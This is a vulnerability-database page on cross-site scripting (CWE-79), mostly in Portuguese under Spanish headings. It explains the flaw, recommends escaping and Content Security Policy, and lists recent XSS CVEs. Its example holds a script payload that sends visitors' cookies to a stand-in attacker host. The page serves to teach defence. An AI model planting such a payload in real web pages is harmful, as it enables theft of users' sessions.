Fallos del tipo CWE-79

28.988 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2022-1526LOWEmlog Pro POST Parameter cross site scriptingEPSS 0.6%CVE-2022-3069MEDIUMWordlift < 3.37.2 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2026-45468MEDIUMMicrosoft SharePoint Server Spoofing VulnerabilityEPSS 0.6%CVE-2022-27494HIGHCROSS-SITE SCRIPTING CWE-79EPSS 0.6%CVE-2015-10101LOWGoogle Analytics Top Content Widget Plugin class-tgm-plugin-activation.php cross site scriptingEPSS 0.6%CVE-2024-31634MEDIUMCross Site Scripting (XSS) vulnerability in Xunruicms versions 4.6.3 and before, allows remote attacker to execute arbitrary code via the SeEPSS 0.6%CVE-2026-45462MEDIUMMicrosoft SharePoint Server Spoofing VulnerabilityEPSS 0.6%CVE-2026-47640MEDIUMMicrosoft SharePoint Server Spoofing VulnerabilityEPSS 0.6%CVE-2026-55016MEDIUMMicrosoft SharePoint Server Spoofing VulnerabilityEPSS 0.6%CVE-2026-55019MEDIUMMicrosoft SharePoint Server Spoofing VulnerabilityEPSS 0.6%CVE-2022-2843LOWMotoPress Timetable and Event Schedule Quick Edit admin-ajax.php cross site scriptingEPSS 0.6%CVE-2026-64902MEDIUMMicrosoft SharePoint Server Spoofing VulnerabilityEPSS 0.6%CVE-2023-3788LOWActiveITzone Active Super Shop CMS Manage Details Page cross site scriptingEPSS 0.6%CVE-2022-27854MEDIUMWordPress Psychological tests & quizzes plugin <= 0.21.19 - Authenticated Stored Cross-Site Scripting (XSS) vulnerabilityEPSS 0.6%CVE-2026-84648HIGHIn Jenkins 2.579 and earlier, LTS 2.568.2 and earlier, the system log viewer does not escape log record metadata (source, level, and timestaEPSS 0.6%CVE-2023-28636MEDIUMGLPI vulnerable to stored Cross-site Scripting in external linksEPSS 0.6%CVE-2026-45467MEDIUMMicrosoft SharePoint Server Spoofing VulnerabilityEPSS 0.6%CVE-2022-2574MEDIUMMeks Easy Social Share < 1.2.8 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2022-47412MEDIUMONLYOFFICE Workspace Search Stored XSSEPSS 0.6%CVE-2024-31156HIGHBIG-IP Configuration utility XSS vulnerabilityEPSS 0.6%